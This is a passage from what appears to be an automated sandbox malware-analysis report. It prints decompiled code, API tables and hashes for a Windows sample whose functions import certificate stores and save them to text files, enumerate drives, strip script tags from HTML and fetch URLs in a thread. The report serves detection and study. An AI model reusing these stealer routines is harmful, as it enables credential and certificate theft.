							if(IsBadHugeReadPtr(_t29, 0x14) == 0) {
								continue;
							}
							break;
						}
						_t26 = 1;
						goto L14;
					}
					if(_t26 != 0) {
						goto L19;
					}
					goto L16;
				}
				if(IsBadHugeReadPtr(__edi, 4) != 0 ||  *__edi != 0x5a4d) {
					L12:
					return 0;
				} else {
					_t23 =  *((intOrPtr*)(__edi + 0x3c)) + __edi;
					if( *_t23 != 0x4550) {
						goto L12;
					}
					_t30 = _t23 + 0x80;
					_t24 = IsBadHugeReadPtr(_t30, 8);
					if(_t24 != 0 ||  *((intOrPtr*)(_t30 + 4)) == _t24) {
						goto L12;
					} else {
						_t31 =  *_t30;
						if(_t31 == 0) {
							goto L12;
						}
						_t29 = __edi + _t31;
						goto L8;
					}
				}
			}













    0x004068ad
    0x004068ae
    0x004068b2
    0x004068f8
    0x004068fc
    0x00406906
    0x00406950
    0x00406953
    0x0040695b
    0x00406966
    0x00406966
    0x00000000
    0x00406962
    0x00406962
    0x00406968
    0x00000000
    0x00406968
    0x00000000
    0x00000000
    0x00000000
    0x00406908
    0x00406908
    0x00406908
    0x0040690d
    0x00000000
    0x00000000
    0x0040691c
    0x00406929
    0x0040692f
    0x00406930
    0x0040693a
    0x00000000
    0x00000000
    0x0040693c
    0x0040693e
    0x0040694a
    0x00000000
    0x00000000
    0x00000000
    0x0040694a
    0x0040691e
    0x00000000
    0x0040691e
    0x0040694e
    0x00000000
    0x00000000
    0x00000000
    0x0040694e
    0x004068bf
    0x00406922
    0x00000000
    0x004068cb
    0x004068ce
    0x004068d6
    0x00000000
    0x00000000
    0x004068d8
    0x004068e1
    0x004068e9
    0x00000000
    0x004068f0
    0x004068f0
    0x004068f4
    0x00000000
    0x00000000
    0x004068f6
    0x00000000
    0x004068f6
    0x004068e9

    APIs
    • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 004068B7
    • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 004068E1
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004068FE
    • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 00406914
    • lstrcmpi.KERNEL32(?,?), ref: 00406932
    • IsBadHugeReadPtr.KERNEL32(-00000014,00000014), ref: 00406942
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 00406953
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: HugeRead$lstrcmpi
    • String ID:
    • API String ID: 1912838836-0
    • Opcode ID: 1b837c6eecaa347648f46ebfec34324a128b16db92c33cbc6c2541ba812dd3ca
    • Instruction ID: b7ed42011e205c698965e4bacc3207c643d0c74aaed3fc9a788e58e487abcfc0
    • Opcode Fuzzy Hash: 1b837c6eecaa347648f46ebfec34324a128b16db92c33cbc6c2541ba812dd3ca
    • Instruction Fuzzy Hash: F42181B17417129BDB304B249D04BA72794AF11B41B0A803AE982F7AD0E778D9308769
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00403F35, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74stringtimeCOMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E00403F35(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t25;
				void* _t36;
				intOrPtr _t37;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t45;
				intOrPtr* _t46;
				void* _t48;
				void* _t50;

				_t41 = __edx;
				_t39 = __ecx;
				_t48 = _t50 - 0x6c;
				_t37 =  *((intOrPtr*)(_t48 + 0x78));
				_t46 =  *((intOrPtr*)(_t48 + 0x74));
				_t19 =  *0x412b44(_t46, _t37,  *((intOrPtr*)(_t48 + 0x7c)), _t42, _t45, _t36);
				 *((intOrPtr*)(_t48 + 0x7c)) = _t19;
				if(_t19 != 0 && _t46 != 0 &&  *_t46 != 0 &&  *((intOrPtr*)(_t46 + 4)) != 0) {
					GetSystemTime(_t48 + 0x5c);
					_t25 =  *0x412a64; // 0x246f5a8
					wnsprintfW(_t48 - 0x6c, 0x63,  *(_t25 + 0x174), L"grb",  *(_t48 + 0x62) & 0x0000ffff,  *(_t48 + 0x5e) & 0x0000ffff,  *(_t48 + 0x5c) & 0x0000ffff);
					if(E00410DB9(_t39, _t41, 3, 0, _t48 - 0x6c,  *((intOrPtr*)(_t46 + 4)),  *_t46) == 0) {
						L7:
						 *((intOrPtr*)(_t48 + 0x7c)) = 0;
					} else {
						if(_t37 != 0) {
							lstrcatW(_t48 - 0x6c, L".txt");
							if(E00410DB9(_t37, _t41, 3, 0, _t48 - 0x6c, _t37, E0040D3D8(_t37) + _t32) == 0) {
								goto L7;
							}
						}
					}
				}
				return  *((intOrPtr*)(_t48 + 0x7c));
			}














    0x00403f35
    0x00403f35
    0x00403f36
    0x00403f41
    0x00403f45
    0x00403f4e
    0x00403f56
    0x00403f5b
    0x00403f7a
    0x00403f8f
    0x00403fa5
    0x00403fc1
    0x00403ff1
    0x00403ff1
    0x00403fc3
    0x00403fc5
    0x00403fd0
    0x00403fef
    0x00000000
    0x00000000
    0x00403fef
    0x00403fc5
    0x00403fc1
    0x00403ffe

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 00403F4E
    • GetSystemTime.KERNEL32(?), ref: 00403F7A
    • wnsprintfW.SHLWAPI ref: 00403FA5
    • lstrcatW.KERNEL32(?,.txt), ref: 00403FD0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CertImportStoreSystemTimelstrcatwnsprintf
    • String ID: .txt$grb
    • API String ID: 1380901484-2795990106
    • Opcode ID: 430c4c4357b61008cf5982c5ab9a1afba0251044aaaca01c74cc1ba15b42ee2e
    • Instruction ID: 3f18609f751c16ec15fda1963a1a9fb989c7ad19787406847e1524753717746f
    • Opcode Fuzzy Hash: 430c4c4357b61008cf5982c5ab9a1afba0251044aaaca01c74cc1ba15b42ee2e
    • Instruction Fuzzy Hash: 7521AC72900248AEDB309FA9DC45DEBB7BCEF48701F108427BD64E2191E2799A54DB24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004042F5, Relevance: 10.6, APIs: 7, Instructions: 69threadsynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E004042F5(intOrPtr* _a4) {
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _v24;
				short _t23;
				short _t24;
				int _t27;
				signed char _t33;
				intOrPtr* _t42;

				SetThreadPriority(GetCurrentThread(), 0xfffffff1);
				_t42 = _a4;
				while(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
					if( *0x4126e0 != 0) {
						_v24 = GetLogicalDrives();
						_t33 = 2;
						do {
							if((_v24 & 1 << _t33) == 0) {
								goto L7;
							} else {
								_v20 = (_t33 & 0x000000ff) + 0x41;
								_t23 = 0x3a;
								_v18 = _t23;
								_t24 = 0x5c;
								_v16 = _t24;
								_v14 = 0;
								_t27 = GetDriveTypeW( &_v20);
								if(_t27 == 3 || _t27 == 2) {
									E004040B8( &_v20, _t42);
									if(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
										goto L7;
									}
								} else {
									goto L7;
								}
							}
							goto L9;
							L7:
							_t33 = _t33 + 1;
						} while (_t33 < 0x20);
					}
				}
				L9:
				 *_t42 =  *_t42 - 1;
				_push(0);
				return RtlExitUserThread();
			}













    0x0040430a
    0x00404310
    0x00404397
    0x00404321
    0x00404329
    0x0040432d
    0x0040432f
    0x0040433c
    0x00000000
    0x0040433e
    0x00404348
    0x0040434d
    0x0040434e
    0x00404355
    0x00404356
    0x0040435d
    0x00404367
    0x00404370
    0x0040437d
    0x0040438e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404370
    0x00000000
    0x00404390
    0x00404390
    0x00404392
    0x0040432f
    0x00404321
    0x004043a9
    0x004043a9
    0x004043ab
    0x004043b9

    APIs
    • GetCurrentThread.KERNEL32 ref: 00404303
    • SetThreadPriority.KERNEL32(00000000), ref: 0040430A
    • GetLogicalDrives.KERNEL32 ref: 00404323
    • GetDriveTypeW.KERNEL32(?), ref: 00404367
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404386
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 0040439B
    • RtlExitUserThread.NTDLL(00000000), ref: 004043AD
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Thread$ObjectSingleWait$CurrentDriveDrivesExitLogicalPriorityTypeUser
    • String ID:
    • API String ID: 97270378-0
    • Opcode ID: f86a984b63d2a962eb8d1bfc7b5ad36c3935a610374fdeb6d5248330c995d926
    • Instruction ID: b9bff0c12d6fd3fc32bf5c51f199ad95098157e0e7f7010c202028c329d301b5
    • Opcode Fuzzy Hash: f86a984b63d2a962eb8d1bfc7b5ad36c3935a610374fdeb6d5248330c995d926
    • Instruction Fuzzy Hash: 8D11D2712142009BD720AF64ED09A9B77B8EFC1711F00893BFA55D22E0D7388814DB9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00404C56, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 145COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00404C56(intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t52;
				intOrPtr _t57;
				signed int _t58;
				void* _t61;
				void* _t66;
				void* _t69;
				char _t71;
				int _t72;
				void* _t76;
				void* _t77;
				intOrPtr _t80;
				char* _t82;
				intOrPtr _t84;
				void* _t86;

				_t71 = 0;
				_t84 = _a8;
				_v16 = 0;
				_v6 = 0;
				_v20 = 0;
				_v12 = 0;
				if(_t84 <= 0) {
					L43:
					return _v12 - _t71 + _t84;
				} else {
					do {
						_t80 = _a4;
						if(_v16 == 0 ||  *((char*)(_t71 + _t80)) != 0x3e) {
							_t52 =  *((intOrPtr*)(_t71 + _t80));
							if(_t52 != 0x3c) {
								if(_v16 != 0 || _v6 != 0 || _t52 == 0xd || _t52 == 0xa || _t52 == 9) {
									goto L41;
								} else {
									if(_t52 != 0x26 || _t84 - _t71 <= 5) {
										L39:
										 *((char*)(_v12 + _t80)) =  *((intOrPtr*)(_t71 + _t80));
										goto L40;
									} else {
										_t38 = _t80 + 1; // 0x1
										if(StrCmpNIA(_t71 + _t38, "nbsp;", 5) != 0) {
											goto L39;
										}
										 *((char*)(_v12 + _t80)) = 0x20;
										_t71 = _t71 + 5;
										L40:
										_v12 = _v12 + 1;
										goto L41;
									}
								}
							}
							_t57 = _v16;
							_v16 = _v16 + 1;
							if(_t57 != 0) {
								goto L41;
							}
							_t86 = _t84 - _t71;
							_t16 = _t80 + 1; // 0x1
							_t82 = _t71 + _t16;
							if(_v6 == _t57) {
								if(_t86 <= 6) {
									L21:
									_v5 = 0;
									do {
										_t58 = _v5 & 0x000000ff;
										_t22 = _t58 + 0x401a18; // 0x2020202
										_t72 =  *_t22 & 0x000000ff;
										if(_t86 <= _t72) {
											goto L27;
										}
										if(StrCmpNIA(_t82,  *(0x401a08 + _t58 * 4), _t72) != 0) {
											_t61 = 0;
										} else {
											_t61 = E00404C35(_t82, _t72);
										}
										if(_t61 != 0) {
											_t30 =  &(("\n\n\n script")[_v5 & 0x000000ff]); // 0x200a0a0a
											_t71 = _v20;
											 *((char*)(_v12 + _a4)) =  *_t30;
											goto L40;
										}
										L27:
										_v5 = _v5 + 1;
									} while (_v5 < 4);
									_t71 = _v20;
									goto L41;
								}
								if(StrCmpNIA(_t82, "script", 6) != 0) {
									_t66 = 0;
								} else {
									_t76 = 6;
									_t66 = E00404C35(_t82, _t76);
								}
								if(_t66 == 0) {
									goto L21;
								} else {
									_v6 = 1;
									goto L41;
								}
							}
							if(_t86 > 7 &&  *_t82 == 0x2f) {
								_t83 =  &(_t82[1]);
								if(StrCmpNIA( &(_t82[1]), "script", 6) != 0) {
									_t69 = 0;
								} else {
									_t77 = 6;
									_t69 = E00404C35(_t83, _t77);
								}
								if(_t69 != 0) {
									_v6 = 0;
								}
							}
						} else {
							_v16 = _v16 - 1;
						}
						L41:
						_t84 = _a8;
						_t71 = _t71 + 1;
						_v20 = _t71;
					} while (_t71 < _t84);
					goto L43;
				}
			}






















    0x00404c5d
    0x00404c60
    0x00404c63
    0x00404c66
    0x00404c69
    0x00404c6c
    0x00404c71
    0x00404de8
    0x00404df2
    0x00404c77
    0x00404c78
    0x00404c7c
    0x00404c7f
    0x00404c8f
    0x00404c94
    0x00404d8b
    0x00000000
    0x00404d9f
    0x00404da1
    0x00404dcc
    0x00404dd2
    0x00000000
    0x00404daa
    0x00404db1
    0x00404dbe
    0x00000000
    0x00000000
    0x00404dc3
    0x00404dc7
    0x00404dd5
    0x00404dd5
    0x00000000
    0x00404dd5
    0x00404da1
    0x00404d8b
    0x00404c9a
    0x00404c9d
    0x00404ca2
    0x00000000
    0x00000000
    0x00404ca8
    0x00404caa
    0x00404caa
    0x00404cb1
    0x00404cfa
    0x00404d29
    0x00404d29
    0x00404d2d
    0x00404d2d
    0x00404d31
    0x00404d31
    0x00404d3a
    0x00000000
    0x00000000
    0x00404d4e
    0x00404d5b
    0x00404d50
    0x00404d54
    0x00404d54
    0x00404d5f
    0x00404d73
    0x00404d7f
    0x00404d82
    0x00000000
    0x00404d82
    0x00404d61
    0x00404d61
    0x00404d64
    0x00404d6a
    0x00000000
    0x00404d6a
    0x00404d0c
    0x00404d1a
    0x00404d0e
    0x00404d12
    0x00404d13
    0x00404d13
    0x00404d1e
    0x00000000
    0x00404d20
    0x00404d20
    0x00000000
    0x00404d20
    0x00404d1e
    0x00404cb6
    0x00404ccc
    0x00404cd6
    0x00404ce4
    0x00404cd8
    0x00404cdc
    0x00404cdd
    0x00404cdd
    0x00404ce8
    0x00404cee
    0x00404cee
    0x00404ce8
    0x00404c87
    0x00404c87
    0x00404c87
    0x00404dd8
    0x00404dd8
    0x00404ddb
    0x00404ddc
    0x00404ddf
    0x00000000
    0x00404de7

    APIs
    • StrCmpNIA.SHLWAPI(00000002,script,00000006), ref: 00404CCE
    • StrCmpNIA.SHLWAPI(00000001,script,00000006), ref: 00404D04
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: nbsp;$script
    • API String ID: 0-298180595
    • Opcode ID: fa9f9a3406222696a1b16b4978dfdeb00cdca5357d7efd5e56b331a34aa0e9c6
    • Instruction ID: dd6344b6bdd7f258133bf5287c815f08b73ca2b890df7c9639fc54c2e7955426
    • Opcode Fuzzy Hash: fa9f9a3406222696a1b16b4978dfdeb00cdca5357d7efd5e56b331a34aa0e9c6
    • Instruction Fuzzy Hash: 6951F7B0E083497ADF316FA484807BEBB75AF92304F0540BBEA61773C2C23D99469719
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040BFA6, Relevance: 9.1, APIs: 6, Instructions: 137windowthreadnetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E0040BFA6(void* __ecx, void* _a16, int _a20) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void _v24;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v64;
				char* _v68;
				void* _v84;
				struct tagMSG _v112;
				char _v372;
				char _v1396;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t65;
				void* _t86;
				void* _t90;
				signed int _t91;
				int _t94;

				_v8 = _v8 | 0xffffffff;
				_t90 = 0x3c;
				E0040CFFE( &_v84,  &_v84, 0, _t90);
				E0040CFFE( &_v372,  &_v372, 0, 0x104);
				E0040CFFE( &_v1396,  &_v1396, 0, 0x400);
				_t94 = _a20;
				_v68 =  &_v372;
				_v40 =  &_v1396;
				_t53 = ( *(_t94 + 6) & 0x0000ffff) + _t94;
				_v84 = _t90;
				_v64 = 0x103;
				_v36 = 0x3ff;
				_a20 = 0;
				if(( *(_t94 + 2) & 0x00000004) != 0) {
					_t53 = E0040A1FF(__ecx, ( *(_t94 + 4) & 0x0000ffff) + _t94, _t53, _a16);
					_a20 = _t53;
				}
				if(InternetCrackUrlA(_t53, 0, 0,  &_v84) == 0) {
					L14:
					E0040CF40(_a20);
					return _v8;
				}
				_push( *((intOrPtr*)(_a16 + 0x420)));
				_t86 = 2;
				_t91 = E0040A7AC(_t86);
				if(_t91 == 0xffffffff) {
					goto L14;
				}
				_v24 = _a16;
				_v16 =  &_v84;
				_v20 = _t91 * 0x30 +  *0x412e10;
				_v12 = 0;
				_t65 = CreateThread(0, 0, E0040BDB5,  &_v24, 0, 0);
				_a16 = _t65;
				if(_t65 == 0) {
					L10:
					if(_v12 != 1) {
						E0040A838(_t91, 0, _t91);
					} else {
						_v8 = 1;
						if( *(_t94 + 0xc) > 0) {
							E0040CF40( *0x412e14);
							E0040CF40( *0x412e18);
							 *0x412e14 = E0040D0D5(( *(_t94 + 0xc) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 0xc) & 0x0000ffff) + _t94);
							 *0x412e18 = E0040D0D5(( *(_t94 + 4) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 4) & 0x0000ffff) + _t94);
						}
					}
					goto L14;
				}
				L7:
				while(PeekMessageW( &_v112, 0, 0, 0, 1) != 0) {
					DispatchMessageW( &_v112);
				}
				if(MsgWaitForMultipleObjects(1,  &_a16, 0, 0xffffffff, 0x4bf) != 0) {
					goto L7;
				}
				CloseHandle(_a16);
				goto L10;
			}
























    0x0040bfaf
    0x0040bfb8
    0x0040bfc1
    0x0040bfd3
    0x0040bfe5
    0x0040bfea
    0x0040bff3
    0x0040bffc
    0x0040c003
    0x0040c009
    0x0040c00c
    0x0040c013
    0x0040c01a
    0x0040c01d
    0x0040c029
    0x0040c02e
    0x0040c02e
    0x0040c040
    0x0040c135
    0x0040c138
    0x0040c144
    0x0040c144
    0x0040c049
    0x0040c051
    0x0040c057
    0x0040c05c
    0x00000000
    0x00000000
    0x0040c065
    0x0040c06b
    0x0040c07d
    0x0040c08b
    0x0040c08e
    0x0040c094
    0x0040c099
    0x0040c0db
    0x0040c0df
    0x0040c130
    0x0040c0e1
    0x0040c0e1
    0x0040c0ec
    0x0040c0f4
    0x0040c0ff
    0x0040c113
    0x0040c127
    0x0040c127
    0x0040c0ec
    0x00000000
    0x0040c0df
    0x00000000
    0x0040c0a7
    0x0040c0a1
    0x0040c0a1
    0x0040c0d0
    0x00000000
    0x00000000
    0x0040c0d5
    0x00000000

    APIs
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040C038
    • CreateThread.KERNEL32(00000000,00000000,Function_0000BDB5,?,00000000,00000000), ref: 0040C08E
    • DispatchMessageW.USER32(?), ref: 0040C0A1
      • Part of subcall function 0040A838: WaitForSingleObject.KERNEL32(?,000000FF,?,0040C135), ref: 0040A84E
      • Part of subcall function 0040A838: CloseHandle.KERNEL32(?), ref: 0040A857
      • Part of subcall function 0040A838: InternetCloseHandle.WININET(?), ref: 0040A8BB
      • Part of subcall function 0040A838: InternetCloseHandle.WININET(?), ref: 0040A8C4
      • Part of subcall function 0040A838: InternetCloseHandle.WININET(?), ref: 0040A8CD
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040C0B0
    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004BF), ref: 0040C0C8
    • CloseHandle.KERNEL32(?), ref: 0040C0D5
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$Internet$MessageWait$CrackCreateDispatchMultipleObjectObjectsPeekSingleThread
    • String ID:
    • API String ID: 646759295-0
    • Opcode ID: 58677598d2e85e6fa821cf41c32d8a7ddcc9de16f48001721c6e263067564d73
    • Instruction ID: bfb207915b673aee0c6acb3541c3141ec2dc537f11da44106b54937e3b60ebb1
    • Opcode Fuzzy Hash: 58677598d2e85e6fa821cf41c32d8a7ddcc9de16f48001721c6e263067564d73
    • Instruction Fuzzy Hash: F341BFB2900209EBDB10DFA5CD85AEF7BBDEB04318F00423AF515F61D0E7B889508B68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004101B0, Relevance: 9.1, APIs: 6, Instructions: 124fileCOMMON
    Download Yara Rule
    C-Code - Quality: 78%
    			E004101B0(void** __esi, WCHAR* _a4) {
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v33;
				void _v36;
				long _v40;
				char _v41;
				void* _t38;
				int _t50;
				int _t51;
				signed int _t53;
				int _t54;
				int _t57;
				signed int _t60;
				signed int _t61;
				struct _OVERLAPPED* _t65;
				struct _OVERLAPPED* _t69;
				void** _t72;

				_t72 = __esi;
				_push(_t60);
				_t69 = 0;
				_v33 = 0;
				_t38 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 2, 0);
				_t61 = _t60 | 0xffffffff;
				 *__esi = _t38;
				if(_t38 != _t61) {
					_push( &_v12);
					_push(_t38);
					if( *0x412c7c() == 0) {
						_v28 = _t61;
						_v24 = _t61;
					} else {
						_v28 = _v20;
						_v24 = _v16;
					}
					if((_v28 & _v24) == _t61) {
						L7:
						CloseHandle( *_t72);
						 *_t72 =  *_t72 | 0xffffffff;
					} else {
						if((_v28 | _v24) == 0) {
							L21:
							_t72[2] = _t72[2] | 0xffffffff;
							_t34 =  &(_t72[3]);
							 *_t34 = _t72[3] | 0xffffffff;
							__eflags =  *_t34;
							_v41 = 1;
							E0040DCEC( *_t72, _t69, _t69, _t69);
						} else {
							_v20 = _t69;
							_v16 = _t69;
							if(ReadFile( *_t72,  &_v36, 5,  &_v40, _t69) != 0) {
								while(1) {
									__eflags = _v40 - _t69;
									if(_v40 == _t69) {
										goto L21;
									}
									__eflags = _v40 - 5;
									if(_v40 != 5) {
										L19:
										_t50 = E0040DCEC( *_t72, _v20, _v16, _t69);
										__eflags = _t50;
										if(_t50 == 0) {
											goto L7;
										} else {
											_t51 = SetEndOfFile( *_t72);
											__eflags = _t51;
											if(_t51 == 0) {
												goto L7;
											} else {
												goto L21;
											}
										}
									} else {
										_t53 = _v36 ^ _t72[4];
										asm("adc edi, [esp+0x24]");
										_t65 = _t53 + _v20 + 5;
										asm("adc edi, ecx");
										_v36 = _t53;
										__eflags = 0 - _v24;
										if(__eflags > 0) {
											L18:
											_t69 = 0;
											__eflags = 0;
											goto L19;
										} else {
											if(__eflags < 0) {
												L14:
												__eflags = _t53 - 0xa00000;
												if(_t53 > 0xa00000) {
													goto L18;
												} else {
													_t54 = E0040DCEC( *_t72, _t53, 0, 1);
													__eflags = _t54;
													if(_t54 == 0) {
														goto L7;
													} else {
														_v20 = _t65;
														_v16 = 0;
														_t57 = ReadFile( *_t72,  &_v36, 5,  &_v40, 0);
														__eflags = _t57;
														if(_t57 != 0) {
															_t69 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L7;
														}
													}
												}
											} else {
												__eflags = _t65 - _v28;
												if(_t65 > _v28) {
													goto L18;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L22;
								}
								goto L21;
							} else {
								goto L7;
							}
						}
					}
				}
				L22:
				return _v33;
			}























    0x004101b0
    0x004101b9
    0x004101bb
    0x004101cd
    0x004101d2
    0x004101d8
    0x004101db
    0x004101df
    0x004101e9
    0x004101ea
    0x004101f3
    0x00410207
    0x0041020b
    0x004101f5
    0x004101f9
    0x00410201
    0x00410201
    0x00410219
    0x0041024a
    0x0041024c
    0x00410252
    0x0041021b
    0x00410223
    0x00410300
    0x00410300
    0x00410304
    0x00410304
    0x00410304
    0x0041030d
    0x00410312
    0x00410229
    0x00410238
    0x0041023c
    0x00410248
    0x0041025c
    0x0041025c
    0x00410260
    0x00000000
    0x00000000
    0x00410266
    0x0041026b
    0x004102d8
    0x004102e3
    0x004102e8
    0x004102ea
    0x00000000
    0x004102f0
    0x004102f2
    0x004102f8
    0x004102fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004102fa
    0x0041026d
    0x00410271
    0x0041027e
    0x00410282
    0x00410285
    0x00410287
    0x0041028b
    0x0041028f
    0x004102d6
    0x004102d6
    0x004102d6
    0x00000000
    0x00410291
    0x00410291
    0x00410299
    0x00410299
    0x0041029e
    0x00000000
    0x004102a0
    0x004102a6
    0x004102ab
    0x004102ad
    0x00000000
    0x004102af
    0x004102bf
    0x004102c3
    0x004102c7
    0x004102cd
    0x004102cf
    0x0041025a
    0x0041025a
    0x00000000
    0x004102d1
    0x00000000
    0x004102d1
    0x004102cf
    0x004102ad
    0x00410293
    0x00410293
    0x00410297
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00410297
    0x00410291
    0x0041028f
    0x00000000
    0x0041026b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00410248
    0x00410223
    0x00410219
    0x00410317
    0x00410320

    APIs
    • CreateFileW.KERNEL32 ref: 004101D2
    • GetFileSizeEx.KERNEL32(00000000,C0000000), ref: 004101EB
    • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000), ref: 00410240
    • CloseHandle.KERNEL32(?), ref: 0041024C
    • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000,?,?,00000000,00000001), ref: 004102C7
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 004102F2
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: e7b8bdbea03c0b90cf0a563e3e15f64dc6c7d9c7311ccde80ccb79861fd324d4
    • Instruction ID: 53f336cb8e835b1cfc1313064cd71cb3772c02fcdf11f1e18e9767142f57d12d
    • Opcode Fuzzy Hash: e7b8bdbea03c0b90cf0a563e3e15f64dc6c7d9c7311ccde80ccb79861fd324d4
    • Instruction Fuzzy Hash: 06417C71108341AFD720CF15CC89AABBBE8FB88754F144A2EF5E5D2290D7B4D984CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040DC05, Relevance: 9.1, APIs: 6, Instructions: 81fileCOMMON
    Download Yara Rule
    C-Code - Quality: 42%
    			E0040DC05(signed int __eax, void* __ecx, void** __esi, WCHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* _t29;
				void* _t30;
				void* _t33;
				signed int _t34;
				void* _t37;
				void* _t38;
				signed int _t41;
				signed int _t43;

				_t52 = __esi;
				_t41 = __eax;
				asm("sbb eax, eax");
				_t29 = CreateFileW(_a4, (__eax | 0xfffffffe) << 0x1e,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t29;
				if(_t29 == 0xffffffff) {
					L10:
					_t30 = 0;
					__eflags = 0;
				} else {
					_push( &_v12);
					_push(_t29);
					if( *0x412c7c() == 0 || _v8 != 0) {
						L9:
						CloseHandle(_t52[2]);
						goto L10;
					} else {
						_t33 = _v12;
						__esi[1] = _t33;
						if(_t33 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_t34 = 0;
							_t43 = _t41 & 0x00000001;
							_t37 = CreateFileMappingW(__esi[2], 0, (_t34 & 0xffffff00 | __eflags != 0x00000000) + (_t34 & 0xffffff00 | __eflags != 0x00000000) + 2, ??, ??, ??);
							__esi[3] = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								goto L9;
							} else {
								__eflags = _t43;
								_t38 = MapViewOfFile(_t37, (_t43 == 0) + (_t43 == 0) + 2, 0, 0, 0);
								 *__esi = _t38;
								__eflags = _t38;
								if(_t38 != 0) {
									goto L5;
								} else {
									CloseHandle(__esi[3]);
									goto L9;
								}
							}
						} else {
							__esi[3] = 0;
							 *__esi = 0;
							L5:
							_t30 = 1;
						}
					}
				}
				return _t30;
			}













    0x0040dc05
    0x0040dc0b
    0x0040dc19
    0x0040dc31
    0x0040dc37
    0x0040dc3d
    0x0040dcb6
    0x0040dcb6
    0x0040dcb6
    0x0040dc3f
    0x0040dc42
    0x0040dc43
    0x0040dc4c
    0x0040dcad
    0x0040dcb0
    0x00000000
    0x0040dc53
    0x0040dc53
    0x0040dc56
    0x0040dc5b
    0x0040dc66
    0x0040dc67
    0x0040dc68
    0x0040dc6b
    0x0040dc6c
    0x0040dc7b
    0x0040dc81
    0x0040dc84
    0x0040dc86
    0x00000000
    0x0040dc88
    0x0040dc8a
    0x0040dc98
    0x0040dc9e
    0x0040dca0
    0x0040dca2
    0x00000000
    0x0040dca4
    0x0040dca7
    0x00000000
    0x0040dca7
    0x0040dca2
    0x0040dc5d
    0x0040dc5d
    0x0040dc60
    0x0040dc62
    0x0040dc62
    0x0040dc62
    0x0040dc5b
    0x0040dc4c
    0x0040dcbb

    APIs
    • CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,00415FD6,?,?,?,00403A07,004124A8,?,00000006), ref: 0040DC31
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DC44
    • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000), ref: 0040DC7B
    • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DC98
    • CloseHandle.KERNEL32(?,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DCA7
